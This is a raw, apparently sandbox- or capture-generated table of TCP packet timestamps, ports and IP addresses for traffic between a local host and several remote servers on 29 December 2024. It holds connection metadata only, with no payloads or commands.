                                                                                                                                                                                                                    Dec 29, 2024 11:18:28.509776115 CET4972319091192.168.2.7118.107.44.219
                                                                                                                                                                                                                    Dec 29, 2024 11:18:28.517931938 CET1909149723118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:28.518069983 CET1909149723118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:28.518140078 CET4972319091192.168.2.7118.107.44.219
                                                                                                                                                                                                                    Dec 29, 2024 11:18:28.526263952 CET1909149723118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:28.526434898 CET1909149723118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:28.526537895 CET4972319091192.168.2.7118.107.44.219
                                                                                                                                                                                                                    Dec 29, 2024 11:18:28.534488916 CET1909149723118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:28.661151886 CET1909149723118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:28.661242008 CET4972319091192.168.2.7118.107.44.219
                                                                                                                                                                                                                    Dec 29, 2024 11:18:28.661313057 CET1909149723118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:28.663932085 CET1909149723118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:28.663990974 CET1909149723118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:28.664010048 CET4972319091192.168.2.7118.107.44.219
                                                                                                                                                                                                                    Dec 29, 2024 11:18:28.669595003 CET1909149723118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:28.669672012 CET4972319091192.168.2.7118.107.44.219
                                                                                                                                                                                                                    Dec 29, 2024 11:18:28.669703007 CET1909149723118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:28.675287008 CET1909149723118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:28.675342083 CET4972319091192.168.2.7118.107.44.219
                                                                                                                                                                                                                    Dec 29, 2024 11:18:28.675385952 CET1909149723118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:28.681102037 CET1909149723118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:28.681149006 CET1909149723118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:28.681179047 CET4972319091192.168.2.7118.107.44.219
                                                                                                                                                                                                                    Dec 29, 2024 11:18:28.686747074 CET1909149723118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:28.686794043 CET1909149723118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:28.686799049 CET4972319091192.168.2.7118.107.44.219
                                                                                                                                                                                                                    Dec 29, 2024 11:18:28.692409992 CET1909149723118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:28.692468882 CET4972319091192.168.2.7118.107.44.219
                                                                                                                                                                                                                    Dec 29, 2024 11:18:28.692492962 CET1909149723118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:28.698111057 CET1909149723118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:28.698214054 CET4972319091192.168.2.7118.107.44.219
                                                                                                                                                                                                                    Dec 29, 2024 11:18:28.698242903 CET1909149723118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:28.703836918 CET1909149723118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:28.703886032 CET4972319091192.168.2.7118.107.44.219
                                                                                                                                                                                                                    Dec 29, 2024 11:18:28.703916073 CET1909149723118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:28.709486961 CET1909149723118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:28.709556103 CET4972319091192.168.2.7118.107.44.219
                                                                                                                                                                                                                    Dec 29, 2024 11:18:28.709556103 CET1909149723118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:28.715152025 CET1909149723118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:28.715195894 CET4972319091192.168.2.7118.107.44.219
                                                                                                                                                                                                                    Dec 29, 2024 11:18:28.715270042 CET1909149723118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:28.720869064 CET1909149723118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:28.720927000 CET4972319091192.168.2.7118.107.44.219
                                                                                                                                                                                                                    Dec 29, 2024 11:18:28.720952034 CET1909149723118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:28.726670027 CET1909149723118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:28.726712942 CET4972319091192.168.2.7118.107.44.219
                                                                                                                                                                                                                    Dec 29, 2024 11:18:28.726778030 CET1909149723118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:28.732275963 CET1909149723118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:28.732383013 CET4972319091192.168.2.7118.107.44.219
                                                                                                                                                                                                                    Dec 29, 2024 11:18:28.732410908 CET1909149723118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:28.737930059 CET1909149723118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:28.737993002 CET4972319091192.168.2.7118.107.44.219
                                                                                                                                                                                                                    Dec 29, 2024 11:18:28.738106012 CET1909149723118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:28.743639946 CET1909149723118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:28.743680000 CET1909149723118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:28.743688107 CET4972319091192.168.2.7118.107.44.219
                                                                                                                                                                                                                    Dec 29, 2024 11:18:28.749397993 CET1909149723118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:28.749452114 CET4972319091192.168.2.7118.107.44.219
                                                                                                                                                                                                                    Dec 29, 2024 11:18:28.749460936 CET1909149723118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:28.754987955 CET1909149723118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:28.755044937 CET4972319091192.168.2.7118.107.44.219
                                                                                                                                                                                                                    Dec 29, 2024 11:18:28.755098104 CET1909149723118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:28.760699987 CET1909149723118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:28.760754108 CET4972319091192.168.2.7118.107.44.219
                                                                                                                                                                                                                    Dec 29, 2024 11:18:28.877772093 CET1909149723118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:28.877813101 CET1909149723118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:28.877857924 CET4972319091192.168.2.7118.107.44.219
                                                                                                                                                                                                                    Dec 29, 2024 11:18:28.879055023 CET1909149723118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:28.879184008 CET1909149723118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:28.879262924 CET4972319091192.168.2.7118.107.44.219
                                                                                                                                                                                                                    Dec 29, 2024 11:18:28.883584023 CET1909149723118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:28.883788109 CET1909149723118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:28.883863926 CET4972319091192.168.2.7118.107.44.219
                                                                                                                                                                                                                    Dec 29, 2024 11:18:28.887938976 CET1909149723118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:28.888077021 CET1909149723118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:28.888143063 CET4972319091192.168.2.7118.107.44.219
                                                                                                                                                                                                                    Dec 29, 2024 11:18:28.892385960 CET1909149723118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:28.892471075 CET1909149723118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:28.892524004 CET4972319091192.168.2.7118.107.44.219
                                                                                                                                                                                                                    Dec 29, 2024 11:18:28.896768093 CET1909149723118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:28.896869898 CET1909149723118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:28.896918058 CET4972319091192.168.2.7118.107.44.219
                                                                                                                                                                                                                    Dec 29, 2024 11:18:28.901072979 CET1909149723118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:28.901185989 CET1909149723118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:28.901241064 CET4972319091192.168.2.7118.107.44.219
                                                                                                                                                                                                                    Dec 29, 2024 11:18:28.905380964 CET1909149723118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:28.905503988 CET1909149723118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:28.905663967 CET4972319091192.168.2.7118.107.44.219
                                                                                                                                                                                                                    Dec 29, 2024 11:18:28.909634113 CET1909149723118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:28.909791946 CET1909149723118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:28.909842014 CET4972319091192.168.2.7118.107.44.219
                                                                                                                                                                                                                    Dec 29, 2024 11:18:28.913990974 CET1909149723118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:28.914046049 CET1909149723118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:28.914107084 CET4972319091192.168.2.7118.107.44.219
                                                                                                                                                                                                                    Dec 29, 2024 11:18:28.918332100 CET1909149723118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:28.918476105 CET1909149723118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:28.918534994 CET4972319091192.168.2.7118.107.44.219
                                                                                                                                                                                                                    Dec 29, 2024 11:18:28.922650099 CET1909149723118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:28.922780037 CET1909149723118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:28.922818899 CET4972319091192.168.2.7118.107.44.219
                                                                                                                                                                                                                    Dec 29, 2024 11:18:28.926969051 CET1909149723118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:28.927030087 CET1909149723118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:28.927069902 CET4972319091192.168.2.7118.107.44.219
                                                                                                                                                                                                                    Dec 29, 2024 11:18:28.931339025 CET1909149723118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:28.931443930 CET1909149723118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:28.931499004 CET4972319091192.168.2.7118.107.44.219
                                                                                                                                                                                                                    Dec 29, 2024 11:18:28.935633898 CET1909149723118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:28.935787916 CET1909149723118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:28.935846090 CET4972319091192.168.2.7118.107.44.219
                                                                                                                                                                                                                    Dec 29, 2024 11:18:28.940016031 CET1909149723118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:28.940058947 CET1909149723118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:28.940186024 CET4972319091192.168.2.7118.107.44.219
                                                                                                                                                                                                                    Dec 29, 2024 11:18:28.944242954 CET1909149723118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:28.944287062 CET1909149723118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:28.944340944 CET4972319091192.168.2.7118.107.44.219
                                                                                                                                                                                                                    Dec 29, 2024 11:18:28.948596001 CET1909149723118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:28.948719025 CET1909149723118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:28.948770046 CET4972319091192.168.2.7118.107.44.219
                                                                                                                                                                                                                    Dec 29, 2024 11:18:28.952857971 CET1909149723118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:28.953022003 CET1909149723118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:28.953142881 CET4972319091192.168.2.7118.107.44.219
                                                                                                                                                                                                                    Dec 29, 2024 11:18:28.957158089 CET1909149723118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:28.957285881 CET1909149723118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:28.957401991 CET4972319091192.168.2.7118.107.44.219
                                                                                                                                                                                                                    Dec 29, 2024 11:18:28.961565018 CET1909149723118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:28.961642981 CET1909149723118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:28.961714983 CET4972319091192.168.2.7118.107.44.219
                                                                                                                                                                                                                    Dec 29, 2024 11:18:28.965845108 CET1909149723118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:28.965936899 CET1909149723118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:28.966013908 CET4972319091192.168.2.7118.107.44.219
                                                                                                                                                                                                                    Dec 29, 2024 11:18:28.970278025 CET1909149723118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:28.970387936 CET1909149723118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:28.970465899 CET4972319091192.168.2.7118.107.44.219
                                                                                                                                                                                                                    Dec 29, 2024 11:18:28.974447012 CET1909149723118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:28.974514008 CET1909149723118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:28.974663019 CET4972319091192.168.2.7118.107.44.219
                                                                                                                                                                                                                    Dec 29, 2024 11:18:28.978934050 CET1909149723118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:28.979042053 CET1909149723118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:28.979146957 CET4972319091192.168.2.7118.107.44.219
                                                                                                                                                                                                                    Dec 29, 2024 11:18:28.983144045 CET1909149723118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:28.983305931 CET1909149723118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:28.983361959 CET4972319091192.168.2.7118.107.44.219
                                                                                                                                                                                                                    Dec 29, 2024 11:18:28.987431049 CET1909149723118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:28.987591982 CET1909149723118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:28.987725973 CET4972319091192.168.2.7118.107.44.219
                                                                                                                                                                                                                    Dec 29, 2024 11:18:28.991816998 CET1909149723118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:28.991990089 CET1909149723118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:28.992100954 CET4972319091192.168.2.7118.107.44.219
                                                                                                                                                                                                                    Dec 29, 2024 11:18:28.996151924 CET1909149723118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:28.996315002 CET1909149723118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:28.996403933 CET4972319091192.168.2.7118.107.44.219
                                                                                                                                                                                                                    Dec 29, 2024 11:18:29.000456095 CET1909149723118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:29.000478029 CET1909149723118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:29.000669003 CET4972319091192.168.2.7118.107.44.219
                                                                                                                                                                                                                    Dec 29, 2024 11:18:29.004930973 CET1909149723118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:29.004945040 CET1909149723118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:29.005017042 CET4972319091192.168.2.7118.107.44.219
                                                                                                                                                                                                                    Dec 29, 2024 11:18:29.009135008 CET1909149723118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:29.073616982 CET4972319091192.168.2.7118.107.44.219
                                                                                                                                                                                                                    Dec 29, 2024 11:18:29.094578028 CET1909149723118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:29.094625950 CET1909149723118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:29.094692945 CET4972319091192.168.2.7118.107.44.219
                                                                                                                                                                                                                    Dec 29, 2024 11:18:29.096116066 CET1909149723118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:29.096345901 CET1909149723118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:29.096400023 CET4972319091192.168.2.7118.107.44.219
                                                                                                                                                                                                                    Dec 29, 2024 11:18:29.099361897 CET1909149723118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:29.099493980 CET1909149723118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:29.099550009 CET4972319091192.168.2.7118.107.44.219
                                                                                                                                                                                                                    Dec 29, 2024 11:18:29.102582932 CET1909149723118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:29.102708101 CET1909149723118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:29.102758884 CET4972319091192.168.2.7118.107.44.219
                                                                                                                                                                                                                    Dec 29, 2024 11:18:29.105673075 CET1909149723118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:29.105859041 CET1909149723118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:29.106121063 CET4972319091192.168.2.7118.107.44.219
                                                                                                                                                                                                                    Dec 29, 2024 11:18:29.108702898 CET1909149723118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:29.108825922 CET1909149723118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:29.108889103 CET4972319091192.168.2.7118.107.44.219
                                                                                                                                                                                                                    Dec 29, 2024 11:18:29.111788034 CET1909149723118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:29.111908913 CET1909149723118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:29.111954927 CET4972319091192.168.2.7118.107.44.219
                                                                                                                                                                                                                    Dec 29, 2024 11:18:29.114866018 CET1909149723118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:29.114933968 CET1909149723118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:29.114999056 CET4972319091192.168.2.7118.107.44.219
                                                                                                                                                                                                                    Dec 29, 2024 11:18:29.117829084 CET1909149723118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:29.117932081 CET1909149723118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:29.118005037 CET4972319091192.168.2.7118.107.44.219
                                                                                                                                                                                                                    Dec 29, 2024 11:18:29.120590925 CET1909149723118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:29.120723963 CET1909149723118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:29.120791912 CET4972319091192.168.2.7118.107.44.219
                                                                                                                                                                                                                    Dec 29, 2024 11:18:29.123467922 CET1909149723118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:29.123570919 CET1909149723118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:29.123718977 CET4972319091192.168.2.7118.107.44.219
                                                                                                                                                                                                                    Dec 29, 2024 11:18:29.126404047 CET1909149723118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:29.126416922 CET1909149723118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:29.126530886 CET4972319091192.168.2.7118.107.44.219
                                                                                                                                                                                                                    Dec 29, 2024 11:18:29.129139900 CET1909149723118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:29.129180908 CET1909149723118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:29.129232883 CET4972319091192.168.2.7118.107.44.219
                                                                                                                                                                                                                    Dec 29, 2024 11:18:29.132035971 CET1909149723118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:29.132049084 CET1909149723118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:29.132117033 CET4972319091192.168.2.7118.107.44.219
                                                                                                                                                                                                                    Dec 29, 2024 11:18:29.134737015 CET1909149723118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:29.134839058 CET1909149723118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:29.134908915 CET4972319091192.168.2.7118.107.44.219
                                                                                                                                                                                                                    Dec 29, 2024 11:18:29.137461901 CET1909149723118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:29.137551069 CET1909149723118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:29.137645006 CET4972319091192.168.2.7118.107.44.219
                                                                                                                                                                                                                    Dec 29, 2024 11:18:29.140214920 CET1909149723118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:29.140289068 CET1909149723118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:29.140328884 CET4972319091192.168.2.7118.107.44.219
                                                                                                                                                                                                                    Dec 29, 2024 11:18:30.231014013 CET4973619091192.168.2.7118.107.44.219
                                                                                                                                                                                                                    Dec 29, 2024 11:18:30.350405931 CET1909149736118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:30.350604057 CET4973619091192.168.2.7118.107.44.219
                                                                                                                                                                                                                    Dec 29, 2024 11:18:30.444792986 CET4973880192.168.2.7171.8.167.90
                                                                                                                                                                                                                    Dec 29, 2024 11:18:30.564083099 CET8049738171.8.167.90192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:30.564201117 CET4973880192.168.2.7171.8.167.90
                                                                                                                                                                                                                    Dec 29, 2024 11:18:30.603414059 CET4973880192.168.2.7171.8.167.90
                                                                                                                                                                                                                    Dec 29, 2024 11:18:30.722645998 CET8049738171.8.167.90192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:32.175178051 CET8049738171.8.167.90192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:32.175247908 CET4973880192.168.2.7171.8.167.90
                                                                                                                                                                                                                    Dec 29, 2024 11:18:32.216996908 CET4972319091192.168.2.7118.107.44.219
                                                                                                                                                                                                                    Dec 29, 2024 11:18:33.320899010 CET4973880192.168.2.7171.8.167.90
                                                                                                                                                                                                                    Dec 29, 2024 11:18:33.440220118 CET8049738171.8.167.90192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:33.562978983 CET4974880192.168.2.7171.8.167.90
                                                                                                                                                                                                                    Dec 29, 2024 11:18:33.682250023 CET8049748171.8.167.90192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:33.682337046 CET4974880192.168.2.7171.8.167.90
                                                                                                                                                                                                                    Dec 29, 2024 11:18:33.682585955 CET4974880192.168.2.7171.8.167.90
                                                                                                                                                                                                                    Dec 29, 2024 11:18:33.801847935 CET8049748171.8.167.90192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:33.886421919 CET8049738171.8.167.90192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:33.886485100 CET4973880192.168.2.7171.8.167.90
                                                                                                                                                                                                                    Dec 29, 2024 11:18:33.888859034 CET4973880192.168.2.7171.8.167.90
                                                                                                                                                                                                                    Dec 29, 2024 11:18:34.008130074 CET8049738171.8.167.90192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:34.440874100 CET8049738171.8.167.90192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:34.441183090 CET4973880192.168.2.7171.8.167.90
                                                                                                                                                                                                                    Dec 29, 2024 11:18:34.443403006 CET4973880192.168.2.7171.8.167.90
                                                                                                                                                                                                                    Dec 29, 2024 11:18:34.562722921 CET8049738171.8.167.90192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:35.006236076 CET8049738171.8.167.90192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:35.006283998 CET4973880192.168.2.7171.8.167.90
                                                                                                                                                                                                                    Dec 29, 2024 11:18:35.011354923 CET4973880192.168.2.7171.8.167.90
                                                                                                                                                                                                                    Dec 29, 2024 11:18:35.130567074 CET8049738171.8.167.90192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:35.286823034 CET8049748171.8.167.90192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:35.287751913 CET4974880192.168.2.7171.8.167.90
                                                                                                                                                                                                                    Dec 29, 2024 11:18:35.288252115 CET4974880192.168.2.7171.8.167.90
                                                                                                                                                                                                                    Dec 29, 2024 11:18:35.407490969 CET8049748171.8.167.90192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:35.568841934 CET8049738171.8.167.90192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:35.568944931 CET4973880192.168.2.7171.8.167.90
                                                                                                                                                                                                                    Dec 29, 2024 11:18:35.569289923 CET4973880192.168.2.7171.8.167.90
                                                                                                                                                                                                                    Dec 29, 2024 11:18:35.688519955 CET8049738171.8.167.90192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:35.850770950 CET8049748171.8.167.90192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:35.850821972 CET4974880192.168.2.7171.8.167.90
                                                                                                                                                                                                                    Dec 29, 2024 11:18:35.878957033 CET4975680192.168.2.739.156.85.200
                                                                                                                                                                                                                    Dec 29, 2024 11:18:35.879585981 CET4975780192.168.2.739.156.85.231
                                                                                                                                                                                                                    Dec 29, 2024 11:18:35.880091906 CET4975880192.168.2.739.156.85.201
                                                                                                                                                                                                                    Dec 29, 2024 11:18:35.998214006 CET804975639.156.85.200192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:35.998321056 CET4975680192.168.2.739.156.85.200
                                                                                                                                                                                                                    Dec 29, 2024 11:18:35.998892069 CET4975680192.168.2.739.156.85.200
                                                                                                                                                                                                                    Dec 29, 2024 11:18:35.999123096 CET804975739.156.85.231192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:35.999270916 CET4975780192.168.2.739.156.85.231
                                                                                                                                                                                                                    Dec 29, 2024 11:18:35.999360085 CET804975839.156.85.201192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:35.999485970 CET4975880192.168.2.739.156.85.201
                                                                                                                                                                                                                    Dec 29, 2024 11:18:36.118066072 CET804975639.156.85.200192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:36.120131969 CET8049738171.8.167.90192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:36.120239973 CET4973880192.168.2.7171.8.167.90
                                                                                                                                                                                                                    Dec 29, 2024 11:18:37.177819967 CET4973619091192.168.2.7118.107.44.219
                                                                                                                                                                                                                    Dec 29, 2024 11:18:37.297215939 CET1909149736118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:37.297270060 CET1909149736118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:37.297312021 CET1909149736118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:37.297472954 CET1909149736118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:37.370383024 CET4976580192.168.2.739.156.85.231
                                                                                                                                                                                                                    Dec 29, 2024 11:18:37.489645004 CET804976539.156.85.231192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:37.490144014 CET4976580192.168.2.739.156.85.231
                                                                                                                                                                                                                    Dec 29, 2024 11:18:37.587341070 CET4976680192.168.2.739.156.85.201
                                                                                                                                                                                                                    Dec 29, 2024 11:18:37.610970974 CET804975639.156.85.200192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:37.611284971 CET804975639.156.85.200192.168.2.7
